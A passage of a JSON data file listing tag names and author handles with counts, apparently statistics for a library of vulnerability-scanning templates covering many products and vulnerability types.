"name":"symfony","count":4},{"name":"symantec","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"magmi","count":4},{"name":"maps","count":4},{"name":"git","count":4},{"name":"thinkcmf","count":4},{"name":"thinkphp","count":4},{"name":"npm","count":4},{"name":"hongdian","count":4},{"name":"glpi","count":4},{"name":"solarwinds","count":4},{"name":"zabbix","count":4},{"name":"strapi","count":4},{"name":"elastic","count":4},{"name":"slack","count":4},{"name":"firmware","count":4},{"name":"fatpipe","count":4},{"name":"rfi","count":4},{"name":"firebase","count":4},{"name":"samsung","count":4},{"name":"zimbra","count":4},{"name":"grafana","count":4},{"name":"itop","count":3},{"name":"cacti","count":3},{"name":"opensis","count":3},{"name":"kibana","count":3},{"name":"nosqli","count":3},{"name":"smtp","count":3},{"name":"kafka","count":3},{"name":"hoteldruid","count":3},{"name":"cves","count":3},{"name":"log","count":3},{"name":"bitrix","count":3},{"name":"terramaster","count":3},{"name":"jellyfin","count":3},{"name":"ofbiz","count":3},{"name":"caucho","count":3},{"name":"tikiwiki","count":3},{"name":"druid","count":3},{"name":"prometheus","count":3},{"name":"httpd","count":3},{"name":"fpd","count":3},{"name":"azure","count":3},{"name":"github","count":3},{"name":"mail","count":3},{"name":"lfr","count":3},{"name":"vbulletin","count":3},{"name":"node","count":3},{"name":"ebs","count":3},{"name":"linkerd","count":3},{"name":"bigip","count":3},{"name":"oa","count":3},{"name":"backdoor","count":3},{"name":"kevinlab","count":3},{"name":"telerik","count":3},{"name":"injection","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"openssh","count":3},{"name":"nacos","count":3},{"name":"fanruan","count":3},{"name":"search","count":3},{"name":"mongodb","count":3},{"name":"microstrategy","count":3},{"name":"cve2007","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"targa","count":3},{"name":"openam","count":3},{"name":"jeesns","count":3},{"name":"vcenter","count":2},{"name":"prtg","count":2},{"name":"rstudio","count":2},{"name":"sharepoint","count":2},{"name":"bitly","count":2},{"name":"hpe","count":2},{"name":"ilo","count":2},{"name":"payara","count":2},{"name":"dolibarr","count":2},{"name":"qcubed","count":2},{"name":"bruteforce","count":2},{"name":"hasura","count":2},{"name":"bypass","count":2},{"name":"prestashop","count":2},{"name":"keycloak","count":2},{"name":"ec2","count":2},{"name":"kentico","count":2},{"name":"mcafee","count":2},{"name":"chiyu","count":2},{"name":"glassfish","count":2},{"name":"s3","count":2},{"name":"shellshock","count":2},{"name":"tidb","count":2},{"name":"linux","count":2},{"name":"webcam","count":2},{"name":"mida","count":2},{"name":"activemq","count":2},{"name":"jsf","count":2},{"name":"pega","count":2},{"name":"globalprotect","count":2},{"name":"nextcloud","count":2},{"name":"vrealize","count":2},{"name":"waf","count":2},{"name":"harbor","count":2},{"name":"nagios","count":2},{"name":"geowebserver","count":2},{"name":"xxljob","count":2},{"name":"spark","count":2},{"name":"saltstack","count":2},{"name":"maian","count":2},{"name":"akamai","count":2},{"name":"grav","count":2},{"name":"netis","count":2},{"name":"flir","count":2},{"name":"openfire","count":2},{"name":"avantfax","count":2},{"name":"bucket","count":2},{"name":"text","count":2},{"name":"heroku","count":2},{"name":"huawei","count":2},{"name":"axis2","count":2},{"name":"splunk","count":2},{"name":"db","count":2},{"name":"rockmongo","count":2},{"name":"oauth","count":2},{"name":"chamilo","count":2},{"name":"akkadian","count":2},{"name":"kong","count":2},{"name":"couchdb","count":2},{"name":"aruba","count":2},{"name":"emerge","count":2},{"name":"commax","count":2},{"name":"odoo","count":2},{"name":"fortios","count":2},{"name":"dos","count":2},{"name":"service","count":2},{"name":"icewarp","count":2},{"name":"middleware","count":2},{"name":"natshell","count":2},{"name":"nextjs","count":2},{"name":"igs","count":2},{"name":"status","count":2},{"name":"storage","count":2},{"name":"ucmdb","count":2},{"name":"minio","count":2},{"name":"openvpn","count":2},{"name":"getsimple","count":2},{"name":"jboss","count":2},{"name":"upload","count":2},{"name":"embed","count":2},{"name":"wordfence","count":2},{"name":"trixbox","count":2},{"name":"showdoc","count":2},{"name":"cache","count":2},{"name":"netsweeper","count":2},{"name":"paloalto","count":2},{"name":"hjtcloud","count":2},{"name":"axis","count":2},{"name":"phpcollab","count":2},{"name":"backups","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"qihang","count":2},{"name":"yii","count":2},{"name":"aviatrix","count":2},{"name":"favicon","count":2},{"name":"jeedom","count":2},{"name":"sonicwall","count":2},{"name":"horde","count":2},{"name":"cve2005","count":2},{"name":"frp","count":2},{"name":"seeyon","count":2},{"name":"guacamole","count":2},{"name":"sitecore","count":2},{"name":"chyrp","count":2},{"name":"adminer","count":2},{"name":"enumeration","count":2},{"name":"plesk","count":2},{"name":"hostheader-injection","count":2},{"name":"mailchimp","count":2},{"name":"wuzhicms","count":2},{"name":"sonarqube","count":2},{"name":"idrac","count":2},{"name":"totemomail","count":2},{"name":"voipmonitor","count":2},{"name":"places","count":2},{"name":"liferay","count":2},{"name":"ecology","count":2},{"name":"leak","count":2},{"name":"smb","count":2},{"name":"hashicorp","count":2},{"name":"zyxel","count":1},{"name":"tensorflow","count":1},{"name":"pgadmin","count":1},{"name":"viewlinc","count":1},{"name":"csod","count":1},{"name":"panasonic","count":1},{"name":"gateone","count":1},{"name":"craftcms","count":1},{"name":"dvr","count":1},{"name":"wiki","count":1},{"name":"shopware","count":1},{"name":"spidercontrol","count":1},{"name":"maccmsv10","count":1},{"name":"smartblog","count":1},{"name":"qsan","count":1},{"name":"tenda","count":1},{"name":"netdata","count":1},{"name":"bedita","count":1},{"name":"matrix","count":1},{"name":"emby","count":1},{"name":"myvuehelp","count":1},{"name":"ssltls","count":1},{"name":"directions","count":1},{"name":"spip","count":1},{"name":"weglot","count":1},{"name":"phpwiki","count":1},{"name":"openrestry","count":1},{"name":"concrete","count":1},{"name":"locations","count":1},{"name":"panos","count":1},{"name":"mapbox","count":1},{"name":"goahead","count":1},{"name":"bash","count":1},{"name":"cors","count":1},{"name":"sceditor","count":1},{"name":"octoprint","count":1},{"name":"tugboat","count":1},{"name":"cocoon","count":1},{"name":"nc2","count":1},{"name":"twitter","count":1},{"name":"distance","count":1},{"name":"plugin","count":1},{"name":"memcached","count":1},{"name":"openx","count":1},{"name":"klog","count":1},{"name":"skywalking","count":1},{"name":"qdpm","count":1},{"name":"ewebs","count":1},{"name":"hiawatha","count":1},{"name":"gunicorn","count":1},{"name":"razor","count":1},{"name":"bing","count":1},{"name":"rhymix","count":1},{"name":"zarafa","count":1},{"name":"st","count":1},{"name":"oidc","count":1},{"name":"darkstat","count":1},{"name":"wazuh","count":1},{"name":"ognl","count":1},{"name":"cse","count":1},{"name":"mantisbt","count":1},{"name":"javascript","count":1},{"name":"sql","count":1},{"name":"omi","count":1},{"name":"qvisdvr","count":1},{"name":"krweb","count":1},{"name":"svn","count":1},{"name":"rmc","count":1},{"name":"panabit","count":1},{"name":"froxlor","count":1},{"name":"dom","count":1},{"name":"spring","count":1},{"name":"clickhouse","count":1},{"name":"sentry","count":1},{"name":"setup","count":1},{"name":"jfrog","count":1},{"name":"kindeditor","count":1},{"name":"szhe","count":1},{"name":"visualstudio","count":1},{"name":"stripe","count":1},{"name":"graphite","count":1},{"name":"avalanche","count":1},{"name":"ueditor","count":1},{"name":"dvwa","count":1},{"name":"xampp","count":1},{"name":"opm","count":1},{"name":"phpunit","count":1},{"name":"opensns","count":1},{"name":"owasp","count":1},{"name":"jaspersoft","count":1},{"name":"circleci","count":1},{"name":"wing-ftp","count":1},{"name":"csrf","count":1},{"name":"yachtcontrol","count":1},{"name":"fortinet","count":1},{"name":"tpshop","count":1},{"name":"mirai","count":1},{"name":"okiko","count":1},{"name":"rujjie","count":1},{"name":"api-manager","count":1},{"name":"asana","count":1},{"name":"visualtools","count":1},{"name":"exacqvision","count":1},{"name":"javamelody","count":1},{"name":"weather","count":1},{"name":"nearby","count":1},{"name":"clockwatch","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"totaljs","count":1},{"name":"pyramid","count":1},{"name":"pcoip","count":1},{"name":"processmaker","count":1},{"name":"nordex","count":1},{"name":"weiphp","count":1},{"name":"sprintful","count":1},{"name":"solman","count":1},{"name":"mariadb","count":1},{"name":"erp-nc","count":1},{"name":"netrc","count":1},{"name":"labtech","count":1},{"name":"synnefo","count":1},{"name":"daybyday","count":1},{"name":"geolocation","count":1},{"name":"okta","count":1},{"name":"wifisky","count":1},{"name":"idemia","count":1},{"name":"zmanda","count":1},{"name":"extractor","count":1},{"name":"remkon","count":1},{"name":"square","count":1},{"name":"newrelic","count":1},{"name":"xiuno","count":1},{"name":"anchorcms","count":1},{"name":"hubspot","count":1},{"name":"couchbase","count":1},{"name":"werkzeug","count":1},{"name":"fortigates","count":1},{"name":"postmessage","count":1},{"name":"cerebro","count":1},{"name":"ruby","count":1},{"name":"place","count":1},{"name":"fuelcms","count":1},{"name":"netgenie","count":1},{"name":"plastic","count":1},{"name":"mrtg","count":1},{"name":"lancom","count":1},{"name":"optiLink","count":1},{"name":"wavemaker","count":1},{"name":"sangfor","count":1},{"name":"karel","count":1},{"name":"moinmoin","count":1},{"name":"expose","count":1},{"name":"magicflow","count":1},{"name":"tika","count":1},{"name":"cve2006","count":1},{"name":"dnssec","count":1},{"name":"xmlchart","count":1},{"name":"motorola","count":1},{"name":"ipstack","count":1},{"name":"calendly","count":1},{"name":"opencast","count":1},{"name":"monitorix","count":1},{"name":"shopizer","count":1},{"name":"gotmls","count":1},{"name":"chinaunicom","count":1},{"name":"influxdb","count":1},{"name":"nerdgraph","count":1},{"name":"blue-ocean","count":1},{"name":"nuuo","count":1},{"name":"shoretel","count":1},{"name":"gogs","count":1},{"name":"proftpd","count":1},{"name":"glowroot","count":1},{"name":"domxss","count":1},{"name":"interlib","count":1},{"name":"postgres","count":1},{"name":"traefik","count":1},{"name":"cobub","count":1},{"name":"kubeflow","count":1},{"name":"sgp","count":1},{"name":"zenario","count":1},{"name":"realteo","count":1},{"name":"empirecms","count":1},{"name":"socomec","count":1},{"name":"calendarix","count":1},{"name":"iceflow","count":1},{"name":"actuator","count":1},{"name":"dotclear","count":1},{"name":"tracer","count":1},{"name":"nette","count":1},{"name":"nedi","count":1},{"name":"lotus","count":1},{"name":"feifeicms","count":1},{"name":"route","count":1},{"name":"keenetic","count":1},{"name":"rockethchat","count":1},{"name":"clockwork","count":1},{"name":"discourse","count":1},{"name":"nimble","count":1},{"name":"openweather","count":1},{"name":"simplecrm","count":1},{"name":"gstorage","count":1},{"name":"nexusdb","count":1},{"name":"jenkin","count":1},{"name":"websphere","count":1},{"name":"adb","count":1},{"name":"servicedesk","count":1},{"name":"tinypng","count":1},{"name":"glances","count":1},{"name":"zend","count":1},{"name":"sage","count":1},{"name":"landrayoa","count":1},{"name":"circle","count":1},{"name":"yealink","count":1},{"name":"commscope","count":1},{"name":"tcexam","count":1},{"name":"springframework","count":1},{"name":"ghost","count":1},{"name":"javafaces","count":1},{"name":"jquery","count":1},{"name":"codemeter","count":1},{"name":"diris","count":1},{"name":"zcms","count":1},{"name":"iterable","count":1},{"name":"servicenow","count":1},{"name":"redhat","count":1},{"name":"zzzcms","count":1},{"name":"natemail","count":1},{"name":"wooyun","count":1},{"name":"shopxo","count":1},{"name":"apos","count":1},{"name":"raspap","count":1},{"name":"nweb2fax","count":1},{"name":"sonarcloud","count":1},{"name":"buttercms","count":1},{"name":"zm","count":1},{"name":"phpfastcache","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"artica","count":1},{"name":"lokalise","count":1},{"name":"opentsdb","count":1},{"name":"ricoh","count":1},{"name":"node-red-dashboard","count":1},{"name":"wavlink","count":1},{"name":"resourcespace","count":1},{"name":"eyou","count":1},{"name":"mailgun","count":1},{"name":"elevation","count":1},{"name":"tapestry","count":1},{"name":"zeroshell","count":1},{"name":"rabbitmq","count":1},{"name":"mpsec","count":1},{"name":"pulsesecure","count":1},{"name":"plc","count":1},{"name":"nsasg","count":1},{"name":"tensorboard","count":1},{"name":"basic-auth","count":1},{"name":"default","count":1},{"name":"graphql","count":1},{"name":"graylog","count":1},{"name":"saltapi","count":1},{"name":"loqate","count":1},{"name":"gridx","count":1},{"name":"redmine","count":1},{"name":"acexy","count":1},{"name":"axiom","count":1},{"name":"timezone","count":1},{"name":"wildfly","count":1},{"name":"owa","count":1},{"name":"olivetti","count":1},{"name":"livezilla","count":1},{"name":"cyberoam","count":1},{"name":"acontent","count":1},{"name":"trane","count":1},{"name":"appweb","count":1},{"name":"grails","count":1},{"name":"lighttpd","count":1},{"name":"k8","count":1},{"name":"openstack","count":1},{"name":"placeos","count":1},{"name":"rocketchat","count":1},{"name":"smartsense","count":1},{"name":"jenzabar","count":1},{"name":"centos","count":1},{"name":"phpshowtime","count":1},{"name":"jeewms","count":1},{"name":"ntopng","count":1},{"name":"powercreator","count":1},{"name":"timeclock","count":1},{"name":"metabase","count":1},{"name":"cherokee","count":1},{"name":"sureline","count":1},{"name":"xml","count":1},{"name":"fedora","count":1},{"name":"solarlog","count":1},{"name":"cloudflare","count":1},{"name":"beanstalk","count":1},{"name":"find","count":1},{"name":"nifi","count":1},{"name":"duomicms","count":1},{"name":"csrfguard","count":1},{"name":"huijietong","count":1},{"name":"contentkeeper","count":1},{"name":"uwsgi","count":1},{"name":"triconsole","count":1},{"name":"seacms","count":1},{"name":"rsyncd","count":1},{"name":"haproxy","count":1},{"name":"vidyo","count":1},{"name":"swagger","count":1},{"name":"wakatime","count":1},{"name":"mysql","count":1},{"name":"circontrorl","count":1},{"name":"timesheet","count":1},{"name":"ssl","count":1},{"name":"gespage","count":1},{"name":"alibaba","count":1},{"name":"portainer","count":1},{"name":"etouch","count":1},{"name":"robomongo","count":1},{"name":"webui","count":1},{"name":"monitorr","count":1},{"name":"wondercms","count":1},{"name":"cloudron","count":1},{"name":"testrail","count":1},{"name":"sar2html","count":1},{"name":"accela","count":1},{"name":"circontrol","count":1},{"name":"stem","count":1},{"name":"esmtp","count":1},{"name":"oneblog","count":1},{"name":"fortilogger","count":1},{"name":"acme","count":1},{"name":"k8s","count":1},{"name":"discord","count":1},{"name":"pihole","count":1},{"name":"scs","count":1},{"name":"asus","count":1},{"name":"pivotaltracker","count":1},{"name":"ilo4","count":1},{"name":"upnp","count":1},{"name":"imap","count":1},{"name":"novnc","count":1},{"name":"aspnuke","count":1},{"name":"xdcms","count":1},{"name":"cloudinary","count":1},{"name":"phpinfo","count":1},{"name":"mongo","count":1},{"name":"youtube","count":1},{"name":"buildkite","count":1},{"name":"etherpad","count":1},{"name":"cgi","count":1},{"name":"logontracer","count":1},{"name":"selea","count":1},{"name":"minimouse","count":1},{"name":"sco","count":1},{"name":"lansweeper","count":1},{"name":"tongda","count":1},{"name":"thinkadmin","count":1},{"name":"limit","count":1},{"name":"pippoint","count":1},{"name":"perl","count":1},{"name":"tamronos","count":1},{"name":"bigbluebutton","count":1},{"name":"gilacms","count":1},{"name":"roads","count":1},{"name":"geocode","count":1},{"name":"redwood","count":1},{"name":"dotnetnuke","count":1},{"name":"miscrsoft","count":1},{"name":"pacsone","count":1},{"name":"wmt","count":1},{"name":"details","count":1},{"name":"camunda","count":1},{"name":"cves2001","count":1},{"name":"mdb","count":1},{"name":"exposures","count":1},{"name":"shiro","count":1},{"name":"bolt","count":1},{"name":"meraki","count":1},{"name":"avtech","count":1},{"name":"graph","count":1},{"name":"ruckus","count":1},{"name":"elasticsearch","count":1},{"name":"manager","count":1},{"name":"deviantart","count":1},{"name":"linkedin","count":1},{"name":"webadmin","count":1},{"name":"parentlink","count":1},{"name":"woocommerce","count":1},{"name":"webmodule-ee","count":1},{"name":"auth","count":1},{"name":"kerbynet","count":1},{"name":"phalcon","count":1},{"name":"octobercms","count":1},{"name":"lg-nas","count":1},{"name":"websvn","count":1},{"name":"openerp","count":1},{"name":"landray","count":1},{"name":"sophos","count":1},{"name":"faraday","count":1},{"name":"ulterius","count":1},{"name":"flexbe","count":1},{"name":"maxsite","count":1},{"name":"jnoj","count":1},{"name":"zms","count":1},{"name":"webmin","count":1},{"name":"tjws","count":1},{"name":"twitter-server","count":1},{"name":"apiman","count":1},{"name":"emc","count":1},{"name":"burp","count":1},{"name":"mongoshake","count":1},{"name":"mediumish","count":1},{"name":"lanproxy","count":1},{"name":"key","count":1},{"name":"hiboss","count":1},{"name":"expn","count":1},{"name":"alertmanager","count":1},{"name":"xunchi","count":1},{"name":"phpfusion","count":1},{"name":"varnish","count":1},{"name":"achecker","count":1},{"name":"blackboard","count":1},{"name":"viewpoint","count":1},{"name":"checkpoint","count":1},{"name":"cofax","count":1},{"name":"argussurveillance","count":1},{"name":"fiori","count":1},{"name":"ems","count":1},{"name":"announcekit","count":1},{"name":"plone","count":1},{"name":"moin","count":1},{"name":"geutebruck","count":1},{"name":"gloo","count":1},{"name":"clusterengine","count":1},{"name":"listserv","count":1},{"name":"ioncube","count":1},{"name":"pagespeed","count":1},{"name":"webftp","count":1},{"name":"finereport","count":1},{"name":"eyelock","count":1},{"name":"cscart","count":1},{"name":"fastcgi","count":1},{"name":"exponentcms","count":1},{"name":"alerta","count":1},{"name":"comodo","count":1},{"name":"metinfo","count":1},{"name":"shoppable","count":1},{"name":"spotify","count":1},{"name":"bookstack","count":1},{"name":"tileserver","count":1},{"name":"hortonworks","count":1},{"name":"zte","count":1},{"name":"lotuscms","count":1},{"name":"frontpage","count":1},{"name":"cloud","count":1},{"name":"nomad","count":1},{"name":"ecom","count":1},{"name":"lutron","count":1},{"name":"mautic","count":1},{"name":"gitea","count":1},{"name":"fortiweb","count":1},{"name":"floc","count":1},{"name":"digitalocean","count":1},{"name":"hadoop","count":1},{"name":"playable","count":1},{"name":"bazarr","count":1},{"name":"linksys","count":1},{"name":"primetek","count":1},{"name":"database","count":1},{"name":"pmb","count":1},{"name":"clink-office","count":1},{"name":"vsphere","count":1},{"name":"embedthis","count":1},{"name":"jmx","count":1},{"name":"openemr","count":1},{"name":"postmark","count":1},{"name":"ns","count":1},{"name":"aura","count":1},{"name":"gurock","count":1},{"name":"office365","count":1},{"name":"redcap","count":1},{"name":"beanshell","count":1},{"name":"streetview","count":1},{"name":"sqlite","count":1},{"name":"tectuus","count":1},{"name":"svnserve","count":1},{"name":"soar","count":1},{"name":"fastapi","count":1},{"name":"mobileiron","count":1},{"name":"speed","count":1},{"name":"terraform","count":1},{"name":"dropbox","count":1},{"name":"mara","count":1},{"name":"eprints","count":1},{"name":"majordomo2","count":1},{"name":"electron","count":1},{"name":"elascticsearch","count":1},{"name":"blind","count":1},{"name":"redis","count":1},{"name":"pendo","count":1},{"name":"netmask","count":1},{"name":"zookeeper","count":1},{"name":"luftguitar","count":1},{"name":"jumpcloud","count":1},{"name":"wamp","count":1},{"name":"vnc","count":1},{"name":"vsftpd","count":1},{"name":"nuxeo","count":1},{"name":"gitlist","count":1},{"name":"geddy","count":1},{"name":"b2evolution","count":1},{"name":"biometrics","count":1},{"name":"elfinder","count":1},{"name":"doh","count":1},{"name":"yzmcms","count":1},{"name":"arl","count":1},{"name":"pagerduty","count":1},{"name":"kafdrop","count":1},{"name":"gsoap","count":1},{"name":"fortigate","count":1},{"name":"episerver","count":1},{"name":"rubedo","count":1},{"name":"instagram","count":1},{"name":"turbocrm","count":1},{"name":"eg","count":1},{"name":"rmi","count":1},{"name":"photo","count":1},{"name":"nps","count":1},{"name":"jsp","count":1},{"name":"scimono","count":1},{"name":"email","count":1},{"name":"spf","count":1},{"name":"bingmaps","count":1},{"name":"sendgrid","count":1},{"name":"autocomplete","count":1},{"name":"sourcebans","count":1},{"name":"messaging","count":1},{"name":"visionhub","count":1},{"name":"dotnet","count":1},{"name":"tor","count":1},{"name":"subrion","count":1},{"name":"myucms","count":1},{"name":" default-login","count":1},{"name":"rdp","count":1},{"name":"74cms","count":1},{"name":"sarg","count":1},{"name":"codeigniter","count":1},{"name":"crm","count":1},{"name":"package","count":1},{"name":"oscommerce","count":1},{"name":"ganglia","count":1},{"name":"clave","count":1},{"name":"travis","count":1},{"name":"centreon","count":1},{"name":"addpac","count":1},{"name":"drone","count":1},{"name":"azkaban","count":1},{"name":"chevereto","count":1},{"name":"iptime","count":1},{"name":"bullwark","count":1},{"name":"dompdf","count":1},{"name":"ambari","count":1},{"name":"spectracom","count":1},{"name":"dbeaver","count":1},{"name":"starttls","count":1},{"name":"flink","count":1},{"name":"secmail","count":1},{"name":"h3c-imc","count":1},{"name":"tieline","count":1},{"name":"cockpit","count":1},{"name":"woocomernce","count":1},{"name":"opensmtpd","count":1},{"name":"fcm","count":1},{"name":"xvr","count":1},{"name":"trilithic","count":1},{"name":"vscode","count":1},{"name":"smi","count":1},{"name":"whm","count":1},{"name":"sidekiq","count":1},{"name":"jitsi","count":1},{"name":"expressjs","count":1}],"authors":[{"name":"daffainfo","count":285},{"name":"pikpikcu","count":279},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":200},{"name":"geeknik","count":158},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":71},{"name":"princechaddha","count":64},{"name":"zzeitlin","count":63},{"name":"madrobot","count":61},{"name":"0x_akoko","count":44},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"logicalhunter","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"johnk3r","count":5},{"name":"iamnoooob","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":5},{"name":"elsfa7110","count":5},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"skeltavik","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"_generic_human_","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"idealphase","count":3},{"name":"0w4ys","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"tess","count":3},{"name":"unstabl3","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"vsh00t","count":3},{"name":"mavericknerd","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"jarijaas","count":3},{"name":"sushantkamble","count":3},{"name":"binaryfigments","count":3},{"name":"r12w4n","count":2},{"name":"koti2","count":2},{"name":"bp0lr","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"0xprial","count":2},{"name":"parth","count":2},{"name":"ehsahil","count":2},{"name":"0xrudra","count":2},{"name":"ree4pwn","count":2},{"name":"mohammedsaneem","count":2},{"name":"davidmckennirey","count":2},{"name":"manas_harsh","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"udit_thakkur","count":2},{"name":"alifathi-h1","count":2},{"name":"nkxxkn","count":2},{"name":"hetroublemakr","count":2},{"name":"foulenzer","count":2},{"name":"joeldeleep","count":2},{"name":"0xsmiley","count":2},{"name":"pxmme1337","count":2},{"name":"random-robbie","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"vavkamil","count":2},{"name":"cocxanh","count":2},{"name":"dheerajmadhukar","count":2},{"name":"x1m_martijn","count":2},{"name":"randomrobbie","count":2},{"name":"lotusdll","count":2},{"name":"bernardofsr","count":2},{"name":"moritz nentwig","count":2},{"name":"convisoappsec","count":2},{"name":"w4cky_","count":2},{"name":"hahwul","count":2},{"name":"zomsop82","count":2},{"name":"kiblyn11","count":2},{"name":"0xelkomy","count":2},{"name":"whoever","count":2},{"name":"johnjhacking","count":2},{"name":"swissky","count":2},{"name":"me9187","count":2},{"name":"bsysop","count":2},{"name":"g4l1t0","count":2},{"name":"bing0o","count":2},{"name":"socketz","count":2},{"name":"gal nagli","count":2},{"name":"0xcrypto","count":2},{"name":"arcc","count":2},{"name":"afaq","count":2},{"name":"gevakun","count":2},{"name":"r3naissance","count":2},{"name":"knassar702","count":1},{"name":"vzamanillo","count":1},{"name":"nytr0gen","count":1},{"name":"ahmed sherif","count":1},{"name":"shelld3v","count":1},{"name":"ipanda","count":1},{"name":"furkansenan","count":1},{"name":"jeya seelan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"fopina","count":1},{"name":"mass0ma","count":1},{"name":"yashgoti","count":1},{"name":"absshax","count":1},{"name":"d0rkerdevil","count":1},{"name":"akshansh","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"toufik airane","count":1},{"name":"mhdsamx","count":1},{"name":"j33n1k4","count":1},{"name":"sickwell","count":1},{"name":"ldionmarcil","count":1},{"name":"micha3lb3n","count":1},{"name":"rodnt","count":1},{"name":"borna nematzadeh","count":1},{"name":"c3l3si4n","count":1},{"name":"undefl0w","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"affix","count":1},{"name":"ooooooo_q","count":1},{"name":"zandros0","count":1},{"name":"push4d","count":1},{"name":"kareemse1im","count":1},{"name":"bjhulst","count":1},{"name":"manuelbua","count":1},{"name":"evolutionsec","count":1},{"name":"hanlaomo","count":1},{"name":"0xteles","count":1},{"name":"thebinitghimire","count":1},{"name":"pdp","count":1},{"name":"_c0wb0y_","count":1},{"name":"smaranchand","count":1},{"name":"flag007","count":1},{"name":"andirrahmani1","count":1},{"name":"raesene","count":1},{"name":"0h1in9e","count":1},{"name":"petruknisme","count":1},{"name":"b0yd","count":1},{"name":"adrianmf","count":1},{"name":"_darrenmartyn","count":1},{"name":"qlkwej","count":1},{"name":"streetofhackerr007","count":1},{"name":"b0rn2r00t","count":1},{"name":"izn0u","count":1},{"name":"udyz","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"berkdusunur","count":1},{"name":"blckraven","count":1},{"name":"elouhi","count":1},{"name":"ahmetpergamum","count":1},{"name":"cookiehanhoan","count":1},{"name":"tirtha_mandal","count":1},{"name":"pratik khalane","count":1},{"name":"patralos","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"x6263","count":1},{"name":"gboddin","count":1},{"name":"apt-mirror","count":1},{"name":"nerrorsec","count":1},{"name":"elder tao","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"thevillagehacker","count":1},{"name":"notsoevilweasel","count":1},{"name":"mesaglio","count":1},{"name":"makyotox","count":1},{"name":"philippdelteil","count":1},{"name":"forgedhallpass","count":1},{"name":"_harleo","count":1},{"name":"sy3omda","count":1},{"name":"ilovebinbash","count":1},{"name":"xstp","count":1},{"name":"infosecsanyam","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"deena","count":1},{"name":"becivells","count":1},{"name":"hakluke","count":1},{"name":"retr0","count":1},{"name":"schniggie","count":1},{"name":"tim_koopmans","count":1},{"name":"akash.c","count":1},{"name":"ajaysenr","count":1},{"name":"bolli95","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"shreyapohekar","count":1},{"name":"ohlinge","count":1},{"name":"b4uh0lz","count":1},{"name":"droberson","count":1},{"name":"pudsec","count":1},{"name":"wabafet","count":1},{"name":"th3.d1p4k","count":1},{"name":"willd96","count":1},{"name":"sicksec","count":1},{"name":"alex","count":1},{"name":"exploitation","count":1},{"name":"rotemreiss","count":1},{"name":"brabbit10","count":1},{"name":"un-fmunozs","count":1},{"name":"kabirsuda","count":1},{"name":"divya_mudgal","count":1},{"name":"alperenkesk","count":1},{"name":"kre80r","count":1},{"name":"alph4byt3","count":1},{"name":"aresx","count":1},{"name":"52971","count":1},{"name":"regala_","count":1},{"name":"iampritam","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"bad5ect0r","count":1},{"name":"kurohost","count":1},{"name":"remonsec","count":1},{"name":"jteles","count":1},{"name":"thezakman","count":1},{"name":"yavolo","count":1},{"name":"soyelmago","count":1},{"name":"noamrathaus","count":1},{"name":"rojanrijal","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"dawid-czarnecki","count":1},{"name":"clarkvoss","count":1},{"name":"intx0x80","count":1},{"name":"zhenwarx","count":1},{"name":"juicypotato1","count":1},{"name":"ringo","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"taielab","count":1},{"name":"daviey","count":1},{"name":"jrolf","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ivo palazzolo 